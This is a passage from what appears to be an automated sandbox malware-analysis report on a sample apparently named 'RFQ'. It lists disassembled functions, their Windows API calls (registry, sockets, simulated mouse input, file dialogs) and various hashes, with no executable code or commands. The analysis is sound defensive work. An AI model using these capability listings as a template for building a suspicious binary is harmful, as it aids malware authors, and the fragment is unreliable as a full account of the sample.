                                                                              • Part of subcall function 006B2958: RtlFreeHeap.NTDLL(00000000,00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000), ref: 006B296E
                                                                              • Part of subcall function 006B2958: GetLastError.KERNEL32(00000000,?,006BD771,00000000,00000000,00000000,00000000,?,006BD798,00000000,00000007,00000000,?,006BDB95,00000000,00000000), ref: 006B2980
                                                                            • _free.LIBCMT ref: 006BD7D8
                                                                            • _free.LIBCMT ref: 006BD7E3
                                                                            • _free.LIBCMT ref: 006BD837
                                                                            • _free.LIBCMT ref: 006BD842
                                                                            • _free.LIBCMT ref: 006BD84D
                                                                            • _free.LIBCMT ref: 006BD858
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                            • Instruction ID: 8608345059314cbf614b3fa4c4347e984c58a147319b3daac9e67a7227d5a667
                                                                            • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                            • Instruction Fuzzy Hash: BD1184B1680B45A7D9A1BB71CC0BFCB77DE6F40701F400C2DB39DAA052EA24B6C54B54
                                                                            Function 006E5667 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID: YVn
                                                                            • API String ID: 2931989736-3670506144
                                                                            • Opcode ID: 23b435e9bc2117ca52959a4dbd73685b01c50bd90de28bb5a8a91b6104cb4b02
                                                                            • Instruction ID: d328368d5892ba2f784000a47f89e925d067fae248c20e552e0da29ac7711036
                                                                            • Opcode Fuzzy Hash: 23b435e9bc2117ca52959a4dbd73685b01c50bd90de28bb5a8a91b6104cb4b02
                                                                            • Instruction Fuzzy Hash: 3A01F5B2606B097BD7107B169C42FEA735EAB2239CF504024FD069A390EA55EE1186E9
                                                                            Function 006ED978 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006ED992
                                                                            • LoadStringW.USER32(00000000), ref: 006ED999
                                                                            • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006ED9AF
                                                                            • LoadStringW.USER32(00000000), ref: 006ED9B6
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006ED9FA
                                                                            Strings
                                                                            • %s (%d) : ==> %s: %s %s, xrefs: 006ED9D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Message
                                                                            • String ID: %s (%d) : ==> %s: %s %s
                                                                            • API String ID: 4072794657-3128320259
                                                                            • Opcode ID: 541514b8ead646413bb88100350b63d4188a8f5c31bfc06c60df535a4a6b66d8
                                                                            • Instruction ID: e7cb7987c76969f9d76a5a6705249ec22ed312210e9297fcbe4cdfcf9523f3aa
                                                                            • Opcode Fuzzy Hash: 541514b8ead646413bb88100350b63d4188a8f5c31bfc06c60df535a4a6b66d8
                                                                            • Instruction Fuzzy Hash: 8A0162F65403487FEB119BD88D89FE6326CEB08300F0084A6B746E2081E6789E844F78
                                                                            Function 006F0889 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 006F0899
                                                                            • EnterCriticalSection.KERNEL32(00000000,?), ref: 006F08AB
                                                                            • TerminateThread.KERNEL32(00000000,000001F6), ref: 006F08B9
                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 006F08C7
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006F08D6
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F08E6
                                                                            • LeaveCriticalSection.KERNEL32(00000000), ref: 006F08ED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                            • String ID:
                                                                            • API String ID: 3495660284-0
                                                                            • Opcode ID: 69a9bfd53d38d4cef89d817aa0e2f279d3b44ff2b74319a648ce59ad3dd607f8
                                                                            • Instruction ID: cad6c1683326d5e05d767635559c6946982637b7c244dfd85b461c25796e8288
                                                                            • Opcode Fuzzy Hash: 69a9bfd53d38d4cef89d817aa0e2f279d3b44ff2b74319a648ce59ad3dd607f8
                                                                            • Instruction Fuzzy Hash: 0AF0E171482612BBD7421BD8ED4DBD6BB39FF04742F409121F211518A1CB789561CF94
                                                                            Function 006B0147 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __allrem.LIBCMT ref: 006B004A
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B0066
                                                                            • __allrem.LIBCMT ref: 006B007D
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B009B
                                                                            • __allrem.LIBCMT ref: 006B00B2
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006B00D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                            • String ID:
                                                                            • API String ID: 1992179935-0
                                                                            • Opcode ID: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                            • Instruction ID: 3a202ef306098e127062c00c4f7fd727913a0cc60ffac489b1a2ae05bd0d7ecb
                                                                            • Opcode Fuzzy Hash: f34cbcdfc8d62fc6f68ef1ef0b42743a3754587d6c921e2558e517bac15b21f9
                                                                            • Instruction Fuzzy Hash: A181B6B2A007069EE724AFA8CC41BEB77EADF46364F14413DF511D6281EB70DD818B59
                                                                            Function 00701C37 Relevance: 9.3, APIs: 6, Instructions: 254networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00703070: select.WSOCK32(00000000,?,00000000,00000000,?,?,?,00000000,?,?,?,00700F43,00000000,?,?,00000000), ref: 007030BC
                                                                            • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00701CE7
                                                                            • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00701D08
                                                                            • WSAGetLastError.WSOCK32 ref: 00701D19
                                                                            • inet_ntoa.WSOCK32(?), ref: 00701DB3
                                                                            • htons.WSOCK32(?,?,?,?,?), ref: 00701E02
                                                                            • _strlen.LIBCMT ref: 00701E5C
                                                                              • Part of subcall function 006E3930: _strlen.LIBCMT ref: 006E393A
                                                                              • Part of subcall function 00688725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0069D6D4,?,?,?), ref: 00688741
                                                                              • Part of subcall function 00688725: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0069D6D4,?,?,?), ref: 00688774
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                                            • String ID:
                                                                            • API String ID: 1923757996-0
                                                                            • Opcode ID: 0c6209beafaee097b8e09398d6530219693b77925af86102c7109857f22fc3d4
                                                                            • Instruction ID: 79145d37491802db25e4206185fb080da7d896841cc6a4e7f170a354d9ac8429
                                                                            • Opcode Fuzzy Hash: 0c6209beafaee097b8e09398d6530219693b77925af86102c7109857f22fc3d4
                                                                            • Instruction Fuzzy Hash: 79A1F171204340EFD310EF24C895E2A7BEAAF84318FA48A4CF4564B2E2DB75ED45CB91
                                                                            Function 006B618E Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006A8269,006A8269,?,?,?,006B63DF,00000001,00000001,8BE85006), ref: 006B61E8
                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006B63DF,00000001,00000001,8BE85006,?,?,?), ref: 006B626E
                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006B6368
                                                                            • __freea.LIBCMT ref: 006B6375
                                                                              • Part of subcall function 006B37B0: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,0069FD75,?,?,0068B63D,00000000,?,?,?,006F106C,0071D0D0,?,006C242E), ref: 006B37E2
                                                                            • __freea.LIBCMT ref: 006B637E
                                                                            • __freea.LIBCMT ref: 006B63A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1414292761-0
                                                                            • Opcode ID: d807db61a754796f38bb4c5f42c0a07f7c7110040f4894229b5bc7653ef0f61e
                                                                            • Instruction ID: ba60a19b017140414c9963c982c42468ab1077cf731a52c5f9210142eeb713a0
                                                                            • Opcode Fuzzy Hash: d807db61a754796f38bb4c5f42c0a07f7c7110040f4894229b5bc7653ef0f61e
                                                                            • Instruction Fuzzy Hash: 5651BFB2600216ABEB258F64CC81EFF77EBEB45750B154628F905DA251EB38DD808794
                                                                            Function 0070BB02 Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 0070C8BF: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0070B5D5,?,?), ref: 0070C8DC
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C918
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C98F
                                                                              • Part of subcall function 0070C8BF: _wcslen.LIBCMT ref: 0070C9C5
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0070BBF1
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0070BC4C
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0070BC91
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0070BCC0
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0070BD1A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 0070BD26
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                            • String ID:
                                                                            • API String ID: 1120388591-0
                                                                            • Opcode ID: 79d587f9d294cff37be710294dd800f4af5435971f3272e99e6d6abff46c553d
                                                                            • Instruction ID: b9ec14a4437afa0fbd1160a4e2f5b03f678d2945021d4051a1adbccd0fd956ae
                                                                            • Opcode Fuzzy Hash: 79d587f9d294cff37be710294dd800f4af5435971f3272e99e6d6abff46c553d
                                                                            • Instruction Fuzzy Hash: 8F818F70208241EFD754EF64C895E2ABBE5FF84308F148A5CF4594B2A2DB35EE45CB92
                                                                            Function 006DF696 Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000035), ref: 006DF6A2
                                                                            • SysAllocString.OLEAUT32(?), ref: 006DF749
                                                                            • VariantCopy.OLEAUT32(006DF94D,00000000), ref: 006DF772
                                                                            • VariantClear.OLEAUT32(006DF94D), ref: 006DF796
                                                                            • VariantCopy.OLEAUT32(006DF94D,00000000), ref: 006DF79A
                                                                            • VariantClear.OLEAUT32(?), ref: 006DF7A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                            • String ID:
                                                                            • API String ID: 3859894641-0
                                                                            • Opcode ID: 2afb4a8f3a00d48e71d3b41b587414e30b1cdd6d0fd9d14e274b33e6fa582380
                                                                            • Instruction ID: 7633e66757874f7e7b52055580c89c5ece94e1504739a978cbd565dd3aeadc94
                                                                            • Opcode Fuzzy Hash: 2afb4a8f3a00d48e71d3b41b587414e30b1cdd6d0fd9d14e274b33e6fa582380
                                                                            • Instruction Fuzzy Hash: 7051E831D00310EADF546B64E895A69B3AAEF49710F24847BE907EF3A1DB708841D79A
                                                                            Function 006F902A Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00688FA0: _wcslen.LIBCMT ref: 00688FA5
                                                                              • Part of subcall function 006884E7: _wcslen.LIBCMT ref: 006884FA
                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 006F9403
                                                                            • _wcslen.LIBCMT ref: 006F9424
                                                                            • _wcslen.LIBCMT ref: 006F944B
                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 006F94A3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                            • String ID: X
                                                                            • API String ID: 83654149-3081909835
                                                                            • Opcode ID: baf660cd321042fc21baa09be5041a01d571e1baf2740107d24f2758e10aeb67
                                                                            • Instruction ID: 249722d2095f68a4cd19efa28df92bc88fe9ba1f6eb70ca8ee22a8276e4b6bcf
                                                                            • Opcode Fuzzy Hash: baf660cd321042fc21baa09be5041a01d571e1baf2740107d24f2758e10aeb67
                                                                            • Instruction Fuzzy Hash: 81E1B0315043449FC764EF24C895BAAB7E2BF85310F04866DFA899B392DB70DD05CBA6
                                                                            Function 0069A692 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069B021: GetWindowLongW.USER32(?,000000EB), ref: 0069B032
                                                                            • BeginPaint.USER32(?,?,?), ref: 0069A6C7
                                                                            • GetWindowRect.USER32(?,?), ref: 0069A72B
                                                                            • ScreenToClient.USER32(?,?), ref: 0069A748
                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0069A759
                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 0069A7A7
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006D7BA7
                                                                              • Part of subcall function 0069A7BF: BeginPath.GDI32(00000000), ref: 0069A7DD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                            • String ID:
                                                                            • API String ID: 3050599898-0
                                                                            • Opcode ID: 3bb0dcad4ed4254f844e439b5fef90f5a80b14a60a2801035758ebe6317457c5
                                                                            • Instruction ID: 331bfe202bbf68f725bb6296ccfd6fe16ff6b247d901815d5d9db7c5adb3a89a
                                                                            • Opcode Fuzzy Hash: 3bb0dcad4ed4254f844e439b5fef90f5a80b14a60a2801035758ebe6317457c5
                                                                            • Instruction Fuzzy Hash: 2C41E170504300AFDB11DFA8C884FFA7BFAEB45321F144629F9548B2A1D774A845DBA6
                                                                            Function 006F070D Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 006F072A
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 006F0765
                                                                            • EnterCriticalSection.KERNEL32(?), ref: 006F0781
                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 006F07FA
                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 006F0811
                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 006F083F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                            • String ID:
                                                                            • API String ID: 3368777196-0
                                                                            • Opcode ID: a2154b40613dcfcae6ad01a6732b01e66f1a04f0491e4dea32e44beac19a3e6a
                                                                            • Instruction ID: 0490fd322c87b64b48230f0f5b8bcc95aae86b8abd3536fe1a6ea0864b9ad233
                                                                            • Opcode Fuzzy Hash: a2154b40613dcfcae6ad01a6732b01e66f1a04f0491e4dea32e44beac19a3e6a
                                                                            • Instruction Fuzzy Hash: BC416071900208EFEF05AF94DC85AAA7779FF44310F1480B9EE009A297D734EE55DBA4
                                                                            Function 007180CD Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,006D767D), ref: 0071813E
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00718164
                                                                            • ShowWindow.USER32(?,00000000,?,?,?,?,006D767D), ref: 007181C3
                                                                            • ShowWindow.USER32(00000000,00000004,?,?,?,?,006D767D), ref: 007181D7
                                                                            • EnableWindow.USER32(00000000,00000001), ref: 007181FD
                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00718221
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 642888154-0
                                                                            • Opcode ID: 84244d117d65fb3a7c2091aca93d6a2e7cb09e9c14aa373a4b3d39454d7e44d4
                                                                            • Instruction ID: bcc7c58b04ec58af724553cf3f79a495c1efb1564f357cf9b2a3ef9c699b3893
                                                                            • Opcode Fuzzy Hash: 84244d117d65fb3a7c2091aca93d6a2e7cb09e9c14aa373a4b3d39454d7e44d4
                                                                            • Instruction Fuzzy Hash: BB41A831601244EFDB52CF1CC899BE57BE1FB49315F1880A9E5584B1F2C7BA6C86CB41
                                                                            Function 00702201 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,00000000), ref: 0070220F
                                                                              • Part of subcall function 006FE40C: GetWindowRect.USER32(?,?), ref: 006FE424
                                                                            • GetDesktopWindow.USER32 ref: 00702239
                                                                            • GetWindowRect.USER32(00000000), ref: 00702240
                                                                            • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 0070227C
                                                                            • GetCursorPos.USER32(?), ref: 007022A8
                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00702306
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
